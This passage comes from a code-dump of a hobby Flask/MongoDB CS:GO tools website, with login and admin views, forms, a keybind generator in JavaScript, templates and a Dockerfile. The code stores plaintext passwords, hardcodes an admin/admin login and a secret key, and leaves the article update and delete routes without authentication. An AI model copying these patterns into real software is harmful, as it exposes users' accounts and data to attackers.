email,\n 'reg_time': reg_time,\n 'avatar': avatar\n })\n # 不存在\n return redirect('/login')\n else:\n return render_template('user/register.html', form=form)\n\n# 登录\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n form = login_form()\n if form.validate_on_submit():\n # 登录\n username = form.username.data\n password = form.password.data\n # 查询是否存在\n query_result = db.User.find_one({\n 'username': username,\n 'password': password\n })\n if (query_result):\n # 存在\n session['login_status'] = username\n return redirect('/')\n else:\n # 不存在\n form.username.errors.append('用户名或密码错误')\n return render_template('user/login.html', form=form)\n else:\n return render_template('user/login.html', form=form)\n\n# 退出登录\n@app.route('/logout')\ndef logout():\n try:\n session.pop('login_status')\n except KeyError:\n print('Can\\'t find key <login_status>')\n return redirect('/')\n\n# -------------------后台-------------------\n\n# 登录页\n@app.route('/admin', methods=['GET', 'POST'])\ndef admin():\n form = admin_login_form()\n username = form.username.data\n password = form.password.data\n if form.validate_on_submit():\n if username == 'admin' and password == 'admin':\n session['admin_login_status'] = username\n return redirect('/admin_index')\n else:\n form.admin_username.errors.append('管理员账号或密码错误')\n return render_template('admin/admin_login.html', form=form)\n else:\n return render_template('admin/admin_login.html', form=form)\n\n# 首页\n@app.route('/admin_index', methods=['GET', 'POST'])\ndef admin_index():\n status = None\n try:\n status = session['admin_login_status']\n except KeyError:\n print('Can\\'t find key <admin_login_status>')\n\n # 如果未登录\n if status is None:\n # 返回登录页面\n return redirect('/admin')\n else:\n article = db.Article.find().sort('sendtime', pymongo.DESCENDING)\n return render_template('admin/admin_index.html', article=article)\n\n# 新增内容\n@app.route('/admin_insert', methods=['GET', 'POST'])\ndef admin_insert():\n form = admin_article_form()\n if form.validate_on_submit():\n title = form.title.data\n content = form.content.data\n description = form.description.data\n author = session['admin_login_status']\n list_img = form.list_img.data\n type = form.type.data\n sendtime = get_time()\n readed = '0'\n comments = []\n # 增加数据\n db.Article.insert({\n 'title': title,\n 'content': content,\n 'description': description,\n 'author': author,\n 'list_img': list_img,\n 'type': type,\n 'sendtime': sendtime,\n 'readed': readed,\n 'comments': comments\n })\n return redirect('/admin_index')\n else:\n return render_template('admin/admin_insert.html', form=form)\n\n# 修改内容\n@app.route('/admin_update/<id>', methods=['GET', 'POST'])\ndef admin_update(id):\n oid = ObjectId(id)\n form = admin_article_form()\n query_result = db.Article.find_one({\n '_id': oid\n })\n if form.validate_on_submit():\n title = form.title.data\n description = form.description.data\n list_img = form.list_img.data\n content = form.content.data\n type = form.type.data\n\n db.Article.update({\n '_id': oid\n },{\n '$set':{\n 'title': title,\n 'content': content,\n 'description': description,\n 'list_img': list_img,\n 'type': type\n }\n })\n return redirect('/admin_index')\n else:\n form.title.data = query_result['title']\n form.content.data = query_result['content']\n form.description.data = query_result['description']\n form.list_img.data = query_result['list_img']\n form.type.data = query_result['type']\n\n return render_template('admin/admin_update.html', form=form)\n\n# 删除内容
\n@app.route('/admin_delete/<id>')\ndef admin_delete(id):\n oid = ObjectId(id)\n db.Article.remove({\n '_id': oid\n })\n return redirect('/admin_index')" }, { "alpha_fraction": 0.584856390953064, "alphanum_fraction": 0.5900783538818359, "avg_line_length": 14.222222328186035, "blob_id": "f0ec14b0d2419549cf953618037d5d43f4731598", "content_id": "d210b5e130685e16e5336d38747e2bfe6363b8b4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 651, "license_type": "permissive", "max_line_length": 29, "num_lines": 27, "path": "/README.md", "repo_name": "MyFaith/flask-csgo-tools", "src_encoding": "UTF-8", "text": "## 基于Python-Flask开发的CSGO工具类网站\n\n#### 使用到:\n- Python3\n- Flask\n- Flask-WTForms\n- Pymongo\n- Mongodb\n- Semantic-UI\n- Jinja2\n- Simditor\n\n#### 待做\n- [x] 一键购买\n- [x] 选手签名贴纸生成\n- [x] 用户资料生成\n- [x] bug:用户资料页导航所有字体变小\n- [x] 前台登录(页面+功能)\n- [x] 前台注册(页面+功能)\n- [x] 前台文章评论(页面+功能)\n- [x] 后台文章列表(页面+功能)\n- [x] 后台添加文章(页面+功能)\n- [x] 后台修改文章(页面+功能)\n- [x] 后台删除文章(页面+功能)\n- [x] 后台富文本编辑器\n- [ ] 搜索(暂停)\n- [ ] 后台用户动态获取(暂停)" }, { "alpha_fraction": 0.42885375022888184, "alphanum_fraction": 0.47537878155708313, "avg_line_length": 35.47146987915039, "blob_id": "b154411bbd567102f50246dca82fe4b3fd472844", "content_id": "ae6f1f12b5734ed107a886f989642a3d25691886", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 12144, "license_type": "permissive", "max_line_length": 106, "num_lines": 333, "path": "/app/static/js/keybind/models.js", "repo_name": "MyFaith/flask-csgo-tools", "src_encoding": "UTF-8", "text": "var models = {};\n\nmodels.genData = function(){\n function init(){ \n setItemPairings(itemPairings);\n };\n \n function Key(b, dn, cc, t){\n this.bind = b;\n this.displayName = dn;\n this.command = cc;\n this.type = t;\n this.hasBinds = false;\n this.itemBinds = {\n primary: {\n max: 1,\n selected: [],\n pairings: [],\n },\n secondary: {\n max: 1,\n selected: [],\n pairings: [],\n },\n grenades: {\n max: 4,\n selected: [],\n pairings: [],\n },\n equipment: {\n max: 999,\n selected: [],\n pairings: [],\n },\n };\n };\n \n var keys = {\n kpDivide: new Key('kpDivide','/','kp_slash', 'kp'),\n kpMultiply: new Key('kpMultiply','*','kp_multiply', 'kp'),\n kpSubtract: new Key('kpSubtract','-','kp_minus', 'kp'),\n kp7: new Key('kp7','7','kp_7', 'kp'),\n kp8: new Key('kp8','8','kp_8', 'kp'),\n kp9: new Key('kp9','9','kp_9', 'kp'),\n kpAdd: new Key('kpAdd','+','kp_plus', 'kp'),\n kp4: new Key('kp4','4','kp_4', 'kp'),\n kp5: new Key('kp5','5','kp_5', 'kp'),\n kp6: new Key('kp6','6','kp_6', 'kp'),\n kp1: new Key('kp1','1','kp_1', 'kp'),\n kp2: new Key('kp2','2','kp_2', 'kp'),\n kp3: new Key('kp3','3','kp_3', 'kp'),\n kpEnter: new Key('kpEnter','Enter','kp_enter', 'kp'),\n kp0: new Key('kp0','0','kp_0', 'kp'),\n kpDecimal: new Key('kpDecimal','.','kp_del', 'kp'),\n\n f1: new Key('f1', 'F1', 'f1', 'sk'),\n f2: new Key('f2', 'F2', 'f2', 'sk'),\n f3: new Key('f3', 'F3', 'f3', 'sk'),\n f4: new Key('f4', 'F4', 'f4', 'sk'),\n f5: new Key('f5', 'F5', 'f5', 'sk'),\n f6: new Key('f6', 'F6', 'f6', 'sk'),\n f7: new Key('f7', 'F7', 'f7', 'sk'),\n f8: new Key('f8', 'F8', 'f8', 'sk'),\n f9: new Key('f9', 'F9', 'f9', 'sk'),\n f10: new Key('f10', 'F10', 'f10', 'sk'),\n f11: new Key('f11', 'F11', 'f11', 'sk'),\n f12: new Key('f12', 'F12', 'f12', 'sk'),\n };\n \n function Item(b, dn, cc, c, p, dns){\n this.bind = b;\n this.displayName = dn;\n this.command = cc;\n this.category = c;\n this.price = p;\n this.pairings 
= [];\n this.displayNameShort = dns;\n };\n \n var items = {\n mac10: new Item('mac10','MAC 10','mac10','primary',1050, 'MAC 10'),\n mp9: new Item('mp9','Mp9','mp9','primary',1250, 'Mp9'),\n ump45: new Item('ump45','UMP 45','ump45','primary',1200, 'UMP 45'),\n bizon: new Item('bizon','PP Bizon','bizon','primary',1400, 'PP Bizon'),\n mp7: new Item('mp7','Mp7','mp7','primary',1700, 'Mp7'),\n p90: new Item('p90','P90','p90','primary',2350, 'P90'),\n sawedoff: new Item('sawedoff','Sawed Off','sawedoff','primary',1200, 'Sawed Off'),\n mag7: new Item('mag7','MAG-7','mag7','primary',1800, 'MAG-7'),\n nova: new Item('nova','Nova','nova','primary',1200, 'Nova'),\n xm1014: new Item('xm1014','XM1014','xm1014','primary',2000, 'XM1014'),\n m249: new Item('m249','M249','m249','primary',5200, 'M249'),\n negev: new Item('negev','Negev','negev','primary',5700, 'Negev'),\n galil: new Item('galil','Galil AR','galilar','primary',2000, 'Galil AR'),\n famas: new Item('famas','FAMAS','famas','primary',2250, 'FAMAS'),\n ak47: new Item('ak47','AK-47','ak47','primary',2700, 'AK-47'),\n m4a4: new Item('m4a4','M4A4','m4a1','primary',3100, 'M4A4'),\n m4a1s: new Item('m4a1s','M4A1-S','m4a1','primary',3100, 'M4A1-S'),\n sg553: new Item('sg553','Sg 553','sg556','primary',3000, 'Sg 553'),\n aug: new Item('aug','AUG','aug','primary',3300, 'AUG'),\n scout: new Item('scout','SSG 08','ssg08','primary',1700, 'SSG 08'),\n awp: new Item('awp','AWP','awp','primary',4750, 'AWP'),\n g3sg1: new Item('g3sg1','G3SG1','g3sg1','primary',5000, 'G3SG1'),\n scar20: new Item('scar20','SCAR 20','scar20','primary',5000, 'SCAR 20'),\n glock18: new Item('glock18','Glock 18','glock','secondary',200, 'Glock 18'),\n p2000: new Item('p2000','P2000','hkp2000','secondary',200, 'P2000'),\n usps: new Item('usps','Usp-S','hkp2000','secondary',200, 'USP-S'),\n p250: new Item('p250','P250','p250','secondary',300, 'P250'),\n tec9: new Item('tec9','TEC 9','tec9','secondary',500, 'TEC 9'),\n fiveSeven: new Item('fiveSeven','Five Seven','fiveseven','secondary',500, 'Five Seven'),\n dualies: new Item('dualies','Dual Berettas','elite','secondary',500, 'Dualies'),\n cz75: new Item('cz75','CZ 75','cz75','secondary',500, 'CZ 75'),\n deagle: new Item('deagle','Desert Eagle','deagle','secondary',700, 'Deagle'),\n r8: new Item('r8','R8 Revolver','deagle','secondary',850, 'R8'),\n decoy: new Item('decoy','Decoy Grenade','decoy','grenades',50, 'Decoy'),\n flash: new Item('flash','Flashbang','flashbang','grenades',200, 'Flashbang'),\n smoke: new Item('smoke','Smoke Grenade','smokegrenade','grenades',300, 'Smoke'),\n he: new Item('he','HE Grenade','hegrenade','grenades',300, 'HE'),\n molotov: new Item('molotov','Molotov','molotov','grenades',400, 'Molotov'),\n incendiary: new Item('incendiary','Incendiary Grenade','incgrenade','grenades',400, 'Incendiary'),\n kit: new Item('kit','Defuse Kit','defuser','equipment',400, 'Defuse Kit'),\n zeus: new Item('zeus','Zeus x27','taser','equipment',400, 'Zeus x27'),\n vest: new Item('vest','Kevlar Vest','vest','equipment',600, 'Vest'),\n vesthelm: new Item('vesthelm','Vest + Helmet','vesthelm','equipment',1000, 'Vest/Helmet'),\n };\n \n var itemPairings = {\n mac10: ['mp9'],\n mp9: ['mac10'],\n sawedoff: ['mag7'],\n mag7: ['sawedoff'],\n galil: ['famas'],\n famas: ['galil'],\n ak47: ['m4a4', 'm4a1s'],\n m4a4: ['m4a1s', 'ak47'],\n m4a1s: ['m4a4', 'ak47'],\n sg553: ['aug'],\n aug: ['sg553'],\n g3sg1: ['scar20'],\n scar20: ['g3sg1'],\n glock18: ['p2000', 'usps'],\n p2000: ['usps', 'glock18'],\n usps: ['p2000', 'glock18'],\n tec9: 
['cz75', 'fiveSeven'],\n fiveSeven: ['cz75', 'tec9'],\n cz75: ['tec9', 'fiveSeven'],\n deagle: ['r8'],\n r8: ['deagle'],\n molotov: ['incendiary'],\n incendiary: ['molotov'],\n };\n \n function setItemPairings(data){\n for (var key in data){\n for (var i=0; i<data[key].length; i++){\n items[key].pairings.push(items[data[key][i]]);\n };\n };\n };\n \n \n function bindItem(keyName, itemName){ \n var item = items[itemName];\n var key = keys[keyName];\n var category = item.category;\n var binds = key.itemBinds;\n var bindCategory = binds[category];\n \n function bindPairings(){\n for (var i=0; i< item.pairings.length; i++){\n bindCategory.pairings.push(item.pairings[i]);\n };\n }; \n \n if (bindCategory.max === 1){\n bindCategory.selected = [];\n bindCategory.pairings = [];\n }\n else if (category === 'grenades'){\n var flashCount = 0;\n \n for (var i=0; i<bindCategory.selected.length; i++){\n if (item === items.flash){\n if (bindCategory.selected[i] === item){\n flashCount++;\n if (flashCount > 1){return};\n };\n } \n else {\n if (bindCategory.selected[i] === item){return};\n };\n };\n \n for (var i=0; i<bindCategory.pairings.length; i++){\n if (bindCategory.pairings[i] === item){return};\n };\n \n if (bindCategory.selected.length >= bindCategory.max){return}\n }\n else if (category === 'equipment'){\n for (var i=0; i<bindCategory.selected.length; i++){\n if (bindCategory.selected[i] === item){return};\n };\n \n for (var i=0; i<bindCategory.pairings.length; i++){\n if (bindCategory.pairings[i] === item){return};\n };\n };\n \n if (itemName === 'molotov'){bindCategory.selected.push(item)}\n else {bindCategory.selected.unshift(item)};\n bindPairings();\n key.hasBinds = true;\n pubsub.emit('itemBound', getBinds(keyName));\n };\n \n function unbindItem(keyName, itemName){\n var key = keys[keyName];\n var item = items[itemName];\n var category = item.category;\n var selected = key.itemBinds[category].selected;\n var pairings = key.itemBinds[category].pairings;\n \n for (var i=0; i<selected.length; i++){\n if (selected[i] === item){\n selected.splice(i, 1);\n pubsub.emit('itemUnbound');\n \n if (item.pairings.length > 0){\n key.itemBinds[category].pairings = [];\n pubsub.emit('itemUnbound');\n };\n };\n };\n \n for (var i=0; i<pairings.length; i++){\n if (pairings[i] === item){\n pairings.splice(i, 1);\n pubsub.emit('itemUnbound');\n };\n };\n \n for (var cat in key.itemBinds){\n for (var group in key.itemBinds[cat]){\n if (key.itemBinds[cat][group].length > 0){return};\n };\n };\n \n unbindAllItems(keyName);\n };\n \n function unbindAllItems(keyName){\n var key = keys[keyName];\n var binds = key.itemBinds;\n \n for (var category in binds){\n binds[category].selected = [];\n binds[category].pairings = [];\n };\n \n key.hasBinds = false; \n pubsub.emit('itemUnbound');\n }; \n \n function unbindAllKeys(type){\n for (var key in keys){\n if (keys[key].type === type){\n unbindAllItems(key);\n };\n };\n \n if (type === 'kp') {\n pubsub.emit('unboundAllKeysKp');\n } else {\n pubsub.emit('unboundAllKeysSk');\n };\n };\n \n function getKeysWithBinds(type){\n var keysWithBinds = [];\n \n for (var key in keys){\n if (keys[key].type === type && keys[key].hasBinds){\n keysWithBinds.push(keys[key]);\n };\n };\n \n return keysWithBinds\n };\n \n function getBinds(keyName){\n var key = keys[keyName];\n var binds = key.itemBinds;\n var allBinds = [];\n \n for (var category in binds){\n for (var group in binds[category]){\n if (Array.isArray(binds[category][group])){\n for (var i=0; i<binds[category][group].length; 
i++){\n allBinds.push(binds[category][group][i]);\n };\n };\n };\n };\n \n return allBinds\n };\n \n function getAllBinds(){\n var binds = {}, thisKey, thisKeyBinds;\n \n for (var key in keys){\n thisKey = keys[key];\n \n if (thisKey.hasBinds){\n binds[thisKey.bind] = {};\n binds[thisKey.bind].name = thisKey.command;\n binds[thisKey.bind].items = [];\n thisKeyBinds = getBinds(thisKey.bind);\n \n for (var i=0; i<thisKeyBinds.length; i++){\n binds[thisKey.bind].items.push(thisKeyBinds[i].command);\n };\n };\n };\n \n return binds\n };\n \n return {\n init, keys, items, getKeysWithBinds, bindItem, getBinds, unbindItem,\n unbindAllItems, unbindAllKeys, getAllBinds\n }\n};" }, { "alpha_fraction": 0.507260262966156, "alphanum_fraction": 0.5082191824913025, "avg_line_length": 26.866413116455078, "blob_id": "ade70ae4e0ee19b2d65e12f25347eed3f4bd86e0", "content_id": "f0ca5a9f890a4113380c318bbe3c9b87c91863d5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 7300, "license_type": "permissive", "max_line_length": 74, "num_lines": 262, "path": "/app/static/js/keybind/controllers.js", "repo_name": "MyFaith/flask-csgo-tools", "src_encoding": "UTF-8", "text": "var control = {};\n\ncontrol.generator = function(){\n var model = models.genData();\n var selectedKey = 'kpDivide';\n model.init();\n \n (function vHeader(){\n var view = views.header;\n view.cacheDom();\n \n function resetAll(){\n model.unbindAllKeys('kp');\n model.unbindAllKeys('sk');\n };\n \n view.btnResetAll.click(function(){\n resetAll();\n });\n }());\n \n (function vGenContainer(){\n var view = views.genContainer;\n \n view.cacheDom();\n\n view.btnKpGen.click(function(){\n view.hideSkGen();\n view.showKpGen();\n });\n\n view.btnSkGen.click(function(){\n view.hideKpGen();\n view.showSkGen();\n });\n }());\n \n (function vKpGen(){\n var view = views.kpGen;\n var vOverlay = views.overlay;\n \n view.cacheDom();\n view.appendKeys(model.keys);\n \n function updateView(){\n view.markBoundKeys(model.getKeysWithBinds('kp'));\n };\n\n function openOverlay(thisKey){\n vOverlay.show(model.keys[thisKey].displayName);\n vOverlay.renderItems(model.getBinds(selectedKey));\n };\n \n pubsub.listen('itemBound', updateView);\n pubsub.listen('itemUnbound', updateView);\n pubsub.listen('unboundAllKeysKp', updateView);\n \n view.kpKeys.click(function(){\n var thisKey = $(this).attr('bind'); \n selectedKey = thisKey;\n openOverlay(thisKey);\n });\n \n view.btnKpClear.click(function(){\n model.unbindAllKeys('kp');\n });\n }());\n \n (function vSkGen(){\n var view = views.skGen;\n var vOverlay = views.overlay;\n var addedKeys = [];\n\n view.cacheDom();\n view.appendKeySelector(model.keys);\n\n function updateView(){\n for (var i = 0; i < addedKeys.length; i++){\n view.addBinds(model.getBinds(addedKeys[i]), addedKeys[i]);\n };\n };\n\n function openOverlay(thisKey){\n vOverlay.show(model.keys[thisKey].displayName);\n vOverlay.renderItems(model.getBinds(selectedKey));\n };\n\n function addBindsBox(key){\n for (var i = 0; i < addedKeys.length; i++){\n if (addedKeys[i] === key){return};\n };\n\n view.addBindsBox(model.keys[key]);\n addedKeys.push(key);\n };\n\n function removeBindsBox(box){\n view.removeBindsBox(box);\n\n for (var i = 0; i < addedKeys.length; i++){\n if (addedKeys[i] === box.attr('bind')){\n addedKeys.splice(i, 1);\n };\n };\n };\n\n function removeAllBindsBoxes(){\n view.removeAllBindsBoxes();\n addedKeys = [];\n };\n\n pubsub.listen('itemBound', updateView);\n 
pubsub.listen('itemUnbound', updateView);\n pubsub.listen('unboundAllKeysSk', removeAllBindsBoxes);\n\n view.keySelector.on('change', function(){\n var thisKey = $(this).find(':selected').attr('bind');\n addBindsBox(thisKey);\n });\n\n view.selectedKeys.on('click', '.js-skKey', function(){\n var thisKey = $(this);\n var thisBox = thisKey.parents('.js-bindsBox');\n\n model.unbindAllItems(thisBox.attr('bind'));\n removeBindsBox(thisBox);\n });\n\n view.btnSkClear.click(function(){\n view.removeAllBindsBoxes();\n model.unbindAllKeys('sk');\n addedKeys = [];\n });\n\n view.selectedKeys.on('click', '.js-btn-addBinds', function(){\n var thisKey = $(this).parents('.js-bindsBox').attr('bind');\n selectedKey = thisKey;\n openOverlay(thisKey);\n });\n\n view.selectedKeys.on('click', '.js-item', function(){\n var thisKey = $(this).parents('.js-bindsBox').attr('bind');\n var thisItem = $(this).attr('bind');\n model.unbindItem(thisKey, thisItem);\n });\n }());\n\n (function vOverlay(){\n var view = views.overlay;\n var vKpGen = views.kpGen;\n var vSkGen = views.skGen;\n var addedThisSession = [];\n var deletedThisSession = [];\n\n view.cacheDom();\n view.appendDropMenus(model.items);\n\n function closeOverlay(){\n view.hide();\n };\n\n function updateView(){\n view.renderItems(model.getBinds(selectedKey));\n };\n\n function clearItemMem(){\n addedThisSession = [];\n deletedThisSession = [];\n };\n\n function rememberAdded(item){\n addedThisSession.push(item);\n };\n\n function forgetAdded(){\n var thisItem;\n for (var i=0; i<addedThisSession.length; i++){\n thisItem = addedThisSession[i];\n model.unbindItem(selectedKey, thisItem);\n };\n };\n\n function rememberDeleted(item){\n deletedThisSession.push(item);\n };\n\n function rememberCleared(){\n for (var i=0; i < view.loItems.length; i++){\n deletedThisSession.push($(view.loItems[i]).attr('bind'));\n };\n };\n\n function forgetDeleted(){\n var thisItem;\n for (var i=0; i<deletedThisSession.length; i++){\n thisItem = deletedThisSession[i];\n model.bindItem(selectedKey, thisItem);\n };\n };\n\n pubsub.listen('itemBound', updateView);\n pubsub.listen('itemUnbound', updateView);\n pubsub.listen('unboundAllKeys', updateView);\n\n view.dark.click(function(){\n view.hide();\n });\n \n view.dropSelectors.click(function(){\n var thisSelector = $(this).attr('bind');\n view.toggleDropMenu(thisSelector);\n });\n\n view.loadOut.click(function(){\n view.hideDropMenus();\n });\n \n view.menuItems.click(function(){\n var thisItem = $(this).attr('bind');\n \n rememberAdded(thisItem);\n model.bindItem(selectedKey, thisItem);\n });\n \n view.btnOlAccept.click(function(){\n view.hide();\n });\n \n view.btnOlCancel.click(function(){\n forgetAdded();\n forgetDeleted();\n view.hide();\n });\n \n view.btnOlClear.click(function(){\n rememberCleared();\n model.unbindAllItems(selectedKey);\n });\n \n view.loadOut.on('click', '.js-items img', function(){\n var thisItem = $(this).attr('bind'); \n rememberDeleted(thisItem); \n model.unbindItem(selectedKey, thisItem);\n });\n }());\n \n (function vBindsOutput(){\n var view = views.bindsOutput;\n \n view.cacheDom();\n \n function updateView(){\n view.renderBinds(model.getAllBinds());\n };\n \n pubsub.listen('itemBound', updateView);\n pubsub.listen('itemUnbound', updateView);\n pubsub.listen('unboundAllKeys', updateView);\n }());\n};\n\ncontrol.generator();" }, { "alpha_fraction": 0.6766666769981384, "alphanum_fraction": 0.7099999785423279, "avg_line_length": 24, "blob_id": "8b66e108099d28b60f3920a9d2f3a1d6c5d761b3", "content_id": 
"fc73cfb80ecd372a297172638a5201eb2c44deb7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 300, "license_type": "permissive", "max_line_length": 68, "num_lines": 12, "path": "/app/__init__.py", "repo_name": "MyFaith/flask-csgo-tools", "src_encoding": "UTF-8", "text": "# coding: utf-8\n\nfrom flask import Flask, render_template, url_for, redirect, session\nfrom pymongo import MongoClient\n\napp = Flask(__name__)\nmongo = MongoClient(host='104.194.64.27')\ndb = mongo['csgo']\napp.config['CSRF_ENABLED'] = True\napp.config['SECRET_KEY'] = 'ckddskslksdsdkj'\n\nfrom app import views, forms\n" }, { "alpha_fraction": 0.6020816564559937, "alphanum_fraction": 0.627301812171936, "avg_line_length": 29.108434677124023, "blob_id": "6f7b43f2d917d3adcec3558478a83ddca27d12ef", "content_id": "18c8e8c38ac6928730d78fd6bafe5be499eb1c1a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2958, "license_type": "permissive", "max_line_length": 74, "num_lines": 83, "path": "/app/forms.py", "repo_name": "MyFaith/flask-csgo-tools", "src_encoding": "UTF-8", "text": "# coding: utf-8\n\nfrom flask_wtf import Form\nfrom wtforms import StringField, PasswordField, TextAreaField, SelectField\nfrom wtforms.validators import required, email, length, equal_to\n\nclass register_form(Form):\n username = StringField('username', validators=[\n required(message='请输入用户名'),\n length(max=20, message='用户名不能大于20位'),\n length(min=4, message='用户名不能小于4位')\n ])\n\n password = PasswordField('password', validators=[\n required(message='请输入密码'),\n length(max=20, message='密码不能大于20位'),\n length(min=4, message='密码不能小于4位')\n ])\n\n repassword = PasswordField('repassword', validators=[\n required(message='请输入确认密码'),\n length(max=20, message='确认密码不能大于20位'),\n length(min=4, message='确认密码不能小于4位'),\n equal_to('password', message='密码和确认密码不一致')\n ])\n\n email = StringField('email', validators=[\n required(message='请输入邮箱'),\n email(message='邮箱格式不正确')\n ])\n\nclass login_form(Form):\n username = StringField('username', validators=[\n required(message='请输入用户名'),\n length(max=20, message='用户名不能大于20位'),\n length(min=4, message='用户名不能小于4位')\n ])\n\n password = PasswordField('password', validators=[\n required(message='请输入密码'),\n length(max=20, message='密码不能大于20位'),\n length(min=4, message='密码不能小于4位')\n ])\n\nclass admin_login_form(Form):\n username = StringField('admin_username', validators=[\n required(message='请输入用户名'),\n length(max=20, message='用户名不能大于20位'),\n length(min=4, message='用户名不能小于4位')\n ])\n\n password = PasswordField('admin_password', validators=[\n required(message='请输入密码'),\n length(max=20, message='密码不能大于20位'),\n length(min=4, message='密码不能小于4位')\n ])\n\nclass admin_article_form(Form):\n title = StringField('title', validators=[\n required(message='标题必须输入'),\n length(max=50, message='标题不能大于50字符')\n ])\n\n description = StringField('description', validators=[\n required(message='描述必须输入'),\n length(max=30, message='标题不能大于30字符')\n ])\n\n list_img = StringField('list_img', validators=[\n required(message='封面图必须输入')\n ])\n\n content = TextAreaField('content', validators=[\n required(message='内容必须输入'),\n length(max=50000, message='标题不能大于50000字符')\n ])\n\n type = SelectField('type', choices=[('1', '文章'), ('2', '视频')])\n\nclass comment_add_form(Form):\n content = TextAreaField('content', validators=[\n required(message='请输入评论内容')\n ])" }, { "alpha_fraction": 0.4057970941066742, "alphanum_fraction": 0.4057970941066742, 
"avg_line_length": 26.625, "blob_id": "400a79316a1073e69bbb43fbe5c85a8a5f2793fc", "content_id": "b3395cc9653babe4a3a3a9dc5a634924bb673811", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 1152, "license_type": "permissive", "max_line_length": 81, "num_lines": 40, "path": "/app/templates/user/login.html", "repo_name": "MyFaith/flask-csgo-tools", "src_encoding": "UTF-8", "text": "{% extends 'base.html' %}\n\n{% block title %}\n 登录\n{% endblock %}\n\n{% block content %}\n <form class=\"ui form\" action=\"\" method=\"post\">\n {{ form.csrf_token }}\n {{ form.hidden_tag() }}\n\n {% if form.errors %}\n <div class=\"ui red message\">\n <div class=\"header\">\n 错误消息\n </div>\n <ul class=\"list\">\n {% for error in form.username.errors, form.password.errors %}\n {% for err in error %}\n <li>{{ err }}</li>\n {% endfor %}\n\n {% endfor %}\n </ul>\n </div>\n {% endif %}\n\n <div class=\"field\">\n <label>用户名</label>\n {{ form.username(placeholder=\"请输入用户名\") }}\n </div>\n <div class=\"field\">\n <label>密码</label>\n {{ form.password(placeholder=\"请输入密码\") }}\n </div>\n <div class=\"field\">\n <input class=\"ui fluid basic green button\" type=\"submit\" value=\"登录\">\n </div>\n </form>\n{% endblock %}" }, { "alpha_fraction": 0.489130437374115, "alphanum_fraction": 0.5, "avg_line_length": 16.571428298950195, "blob_id": "8507f654a3926ea457c52419d16c03d7c7e751f8", "content_id": "8e6cdd799f6ee293d4474985baec795ff921797e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 406, "license_type": "permissive", "max_line_length": 49, "num_lines": 21, "path": "/app/templates/404.html", "repo_name": "MyFaith/flask-csgo-tools", "src_encoding": "UTF-8", "text": "{% extends 'base.html' %}\n\n{% block title %}\n 找不到页面\n{% endblock %}\n\n{% block content %}\n\n <h2 class=\"ui dividing header\">\n <br>\n <span>\n <i class=\"remove circle icon\"></i>\n 找不到页面(Page not found)\n </span>\n </h2>\n\n <div class=\"ui center aligned segment basic\">\n <h1>您访问的页面不存在!</h1>\n </div>\n\n{% endblock %}" }, { "alpha_fraction": 0.47560974955558777, "alphanum_fraction": 0.6951219439506531, "avg_line_length": 13.909090995788574, "blob_id": "926675a62591fb1f51611d7578729d3106125bc2", "content_id": "a87bbb7185284df258c500cedacad39031be9b40", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 164, "license_type": "permissive", "max_line_length": 18, "num_lines": 11, "path": "/requirements.txt", "repo_name": "MyFaith/flask-csgo-tools", "src_encoding": "UTF-8", "text": "click==6.6\nFlask==0.11.1\nFlask-WTF==0.12\nitsdangerous==0.24\nJinja2==2.8\nMarkupSafe==0.23\npymongo==2.8.1\nrequests==2.10.0\nsix==1.10.0\nWerkzeug==0.11.10\nWTForms==2.1\n" }, { "alpha_fraction": 0.429824560880661, "alphanum_fraction": 0.4327485263347626, "avg_line_length": 24.370370864868164, "blob_id": "195edc155d88937622eefecfb812b200d9470318", "content_id": "4a20a6b4b5dc7b80e4f41fdfd89c7709bffeb1e2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 684, "license_type": "permissive", "max_line_length": 58, "num_lines": 27, "path": "/app/static/js/keybind/pubsub.js", "repo_name": "MyFaith/flask-csgo-tools", "src_encoding": "UTF-8", "text": "var pubsub = {\n channels: {},\n \n listen: function(event, fn){\n this.channels[event] = this.channels[event] || [];\n this.channels[event].push(fn);\n },\n \n unlisten: function(event, 
fn){\n if (this.channels[event]){\n for (var i=0; i<this.channels[event]; i++){\n if (this.channels[event][i] === fn){\n this.channels[event].splice[i, 1];\n break;\n };\n };\n };\n },\n \n emit: function(event, data){\n if (this.channels[event]){\n this.channels[event].forEach(function(fn){\n fn(data);\n });\n };\n },\n};" }, { "alpha_fraction": 0.7591836452484131, "alphanum_fraction": 0.7755101919174194, "avg_line_length": 23.5, "blob_id": "82a42eeddf6d06f635eb75974482bbade8e496a6", "content_id": "e8a507c6c81a98daffcee5e4ce6c60f7e1d643d7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 245, "license_type": "permissive", "max_line_length": 41, "num_lines": 10, "path": "/Dockerfile", "repo_name": "MyFaith/flask-csgo-tools", "src_encoding": "UTF-8", "text": "FROM python\nMAINTAINER MyFaith <[email protected]>\nRUN mkdir -p /app\nWORKDIR /app\nADD requirements.txt requirements.txt\nRUN pip install -r requirements.txt\nCOPY docker-entrypoint.sh /usr/local/bin/\nEXPOSE 8888\nENTRYPOINT [\"docker-entrypoint.sh\"]\nCMD [\"\"]\n" }, { "alpha_fraction": 0.5177111625671387, "alphanum_fraction": 0.5243285298347473, "avg_line_length": 28.646154403686523, "blob_id": "f38ab3f11ae1d5ac594a2f58d9bfe2c4574e64d1", "content_id": "81b9c557fb1a21763f56b85711f99b2b3b5f689c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 7723, "license_type": "permissive", "max_line_length": 215, "num_lines": 260, "path": "/app/static/js/keybind/views.js", "repo_name": "MyFaith/flask-csgo-tools", "src_encoding": "UTF-8", "text": "var transitions = {\n show: function(el){\n el.show();\n setTimeout(function(){\n el.removeClass('is-hidden')\n 